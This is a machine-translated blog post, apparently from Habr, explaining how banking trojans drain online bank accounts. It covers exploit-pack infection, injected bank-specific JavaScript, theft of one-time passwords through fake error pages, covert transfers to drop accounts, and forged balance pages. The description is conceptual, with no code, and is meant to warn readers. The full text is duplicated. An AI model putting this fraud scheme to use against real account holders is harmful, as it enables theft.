Who needs me?
0x00 Preface
Inspired by a recent post about client bank security. I read the comments and understood that this topic was apparently poorly lit on Habré. Dedicated to everyone who likes to shout "Yes that a hacker can take on my computer," "Yes, who needs me." What's happening? And most importantly, how do the money flow away from the accounts? Interesting? Welcome under habrakat.
')
0x01 Malware, cunning and merciless.
While the cunning Habrovites put antiviruses, Linux and other protective tools, the creators of malware do not sleep and improve their creations day by day. Some of them are admirable, they are elegant and beautiful. And dangerous. If before all the “visible” danger was only in software damage, today, thanks to the spread of MasterCard and Visa, the motives of the criminals have shifted to the financial sphere. About the work of the legendary Zeus / Conficker and other prominent representatives of the malware “community” everyone has already heard about it, but it seems people still do not understand what is happening. While some people rely on SSL certificates, others rely on one-time passwords ... Trouble comes from where it was not expected.
With active surfing, pick up malware is not a difficult task, it usually happens due to the so-called exploit packs, and when a person comes to the compromised page (by the way, this may well be someone’s webpage), a bunch of different attacks are applied to its browser, the main purpose of which is to throw on the surfer system either the malware itself or its downloader. After the animal settled on your system, it waits. Waiting for a browser with an online client-bank to open before it. And then the fun begins.
0x02 Inside the online client bank.
The first time you enter a client bank from an infected machine, the malware performs a reconnaissance of the area. Using XSS or any other method, it loads JavaScript written for this particular bank. And with its help collects all the information just walking around the DOM. What is going to? Everything is collected - the cardholder's full name, balance, various transfers from and to the account. Aggregated information is then sent to the attackers. After that, the malware again falls asleep and waits for further DD.
Further DDs come in the form of information processed by a person - where and how much to send money. After that, the malware starts to wait again, but again without a goal to drain your hard-earned money. In this example, let us consider the case with all the favorite one-time passwords that give some kind of illusion of security. When it comes time to type a one-time password, the malware is cheating and accepts the data in the form caused by the intruders again, that is, in fact, the first password goes to the left, and the user is shown a beautiful page about the authorization error, and then asked to enter the next one-time password. The second password also goes past the addressee, but the user enters the page a client of the bank authorized by the first password. Again, malware closely follows the actions of the user, comparing upcoming actions and changing the balance. Suppose the balance is enough for him to make the necessary transfers. He waits for the user to exit from the client bank. After that, without any user intervention, he is authorized by the second password entered, then with a series of POST / GET requests, he sends money to the drop accounts. Saves delta on balance change and other necessary data. And waiting again.
When the victim visits his client-bank again, the malware replaces him with a beautiful page, taking into account the difference of the withdrawn money. The victim sees that all the money is in place, the left postings due to the action of the next JavaScript are not displayed, all sorts of buttons like “Save my actions to a text file”, etc., etc. are also not displayed, so do not raise panic. Meanwhile, the malware monitors the balance replenishment, and if that happens, the e-wallet clearing scenario happens again. In fact, the victim may lose his savings account and savings over a very decent period of time, thinking that his account is growing.
0x03 Instead of the conclusion
I did not specifically consider all types and methods of malware operation with respect to online bank clients, since there are a great many of them and there is no point in describing them. There are also other schemes that are different from those described here. This information is presented solely for informational purposes, in order to provide some clarity about “safe” online banking. I can only add that almost all modern methods of protection are successfully costing carders. So, make sure your PC is clean and attentive to the use of an online banking client and don’t think that nobody needs you.
Inspired by a recent post about client bank security. I read the comments and understood that this topic was apparently poorly lit on Habré. Dedicated to everyone who likes to shout "Yes that a hacker can take on my computer," "Yes, who needs me." What's happening? And most importantly, how do the money flow away from the accounts? Interesting? Welcome under habrakat.
')
0x01 Malware, cunning and merciless.
While the cunning Habrovites put antiviruses, Linux and other protective tools, the creators of malware do not sleep and improve their creations day by day. Some of them are admirable, they are elegant and beautiful. And dangerous. If before all the “visible” danger was only in software damage, today, thanks to the spread of MasterCard and Visa, the motives of the criminals have shifted to the financial sphere. About the work of the legendary Zeus / Conficker and other prominent representatives of the malware “community” everyone has already heard about it, but it seems people still do not understand what is happening. While some people rely on SSL certificates, others rely on one-time passwords ... Trouble comes from where it was not expected.
With active surfing, pick up malware is not a difficult task, it usually happens due to the so-called exploit packs, and when a person comes to the compromised page (by the way, this may well be someone’s webpage), a bunch of different attacks are applied to its browser, the main purpose of which is to throw on the surfer system either the malware itself or its downloader. After the animal settled on your system, it waits. Waiting for a browser with an online client-bank to open before it. And then the fun begins.
0x02 Inside the online client bank.
The first time you enter a client bank from an infected machine, the malware performs a reconnaissance of the area. Using XSS or any other method, it loads JavaScript written for this particular bank. And with its help collects all the information just walking around the DOM. What is going to? Everything is collected - the cardholder's full name, balance, various transfers from and to the account. Aggregated information is then sent to the attackers. After that, the malware again falls asleep and waits for further DD.
Further DDs come in the form of information processed by a person - where and how much to send money. After that, the malware starts to wait again, but again without a goal to drain your hard-earned money. In this example, let us consider the case with all the favorite one-time passwords that give some kind of illusion of security. When it comes time to type a one-time password, the malware is cheating and accepts the data in the form caused by the intruders again, that is, in fact, the first password goes to the left, and the user is shown a beautiful page about the authorization error, and then asked to enter the next one-time password. The second password also goes past the addressee, but the user enters the page a client of the bank authorized by the first password. Again, malware closely follows the actions of the user, comparing upcoming actions and changing the balance. Suppose the balance is enough for him to make the necessary transfers. He waits for the user to exit from the client bank. After that, without any user intervention, he is authorized by the second password entered, then with a series of POST / GET requests, he sends money to the drop accounts. Saves delta on balance change and other necessary data. And waiting again.
When the victim visits his client-bank again, the malware replaces him with a beautiful page, taking into account the difference of the withdrawn money. The victim sees that all the money is in place, the left postings due to the action of the next JavaScript are not displayed, all sorts of buttons like “Save my actions to a text file”, etc., etc. are also not displayed, so do not raise panic. Meanwhile, the malware monitors the balance replenishment, and if that happens, the e-wallet clearing scenario happens again. In fact, the victim may lose his savings account and savings over a very decent period of time, thinking that his account is growing.
0x03 Instead of the conclusion
I did not specifically consider all types and methods of malware operation with respect to online bank clients, since there are a great many of them and there is no point in describing them. There are also other schemes that are different from those described here. This information is presented solely for informational purposes, in order to provide some clarity about “safe” online banking. I can only add that almost all modern methods of protection are successfully costing carders. So, make sure your PC is clean and attentive to the use of an online banking client and don’t think that nobody needs you.
Source: https://habr.com/ru/post/113787/
All Articles